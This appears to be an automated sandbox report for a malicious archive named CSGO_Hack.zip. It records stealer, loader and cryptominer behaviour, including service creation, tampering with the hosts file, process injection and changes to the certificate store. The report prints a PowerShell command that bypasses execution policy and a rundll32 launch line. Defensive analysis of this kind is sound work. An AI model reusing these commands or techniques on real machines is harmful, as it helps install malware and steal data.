Analysis Overview
SHA256
37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077
Threat Level: Known bad
The file CSGO_Hack.zip was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer
xmrig
Amadey
XMRig Miner payload
Stops running service(s)
Drops file in Drivers directory
Creates new service(s)
Uses the VBS compiler for execution
Checks BIOS information in registry
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Drops file in System32 directory
Suspicious use of SetThreadContext
Modifies system executable filetype association
Executes dropped EXE
Launches sc.exe
Loads dropped DLL
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious behavior: GetForegroundWindowSpam
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-28 18:16
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral15
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:26
Platform
win7-20240221-en
Max time kernel
154s
Max time network
163s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
Network
Files
memory/2956-4-0x000000001B380000-0x000000001B662000-memory.dmp
memory/2956-6-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
memory/2956-7-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2956-8-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2956-5-0x00000000022E0000-0x00000000022E8000-memory.dmp
memory/2956-9-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2956-10-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
memory/2956-11-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2956-12-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
memory/2956-13-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/2956-14-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
memory/2956-15-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
memory/2956-16-0x0000000002560000-0x00000000025E0000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
121s
Max time network
139s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
158s
Command Line
Signatures
Amadey
Lumma Stealer
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\conhost.exe | N/A |
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 636 set thread context of 660 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| PID 1076 set thread context of 2632 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 1076 set thread context of 4700 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 3160 set thread context of 3780 | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5c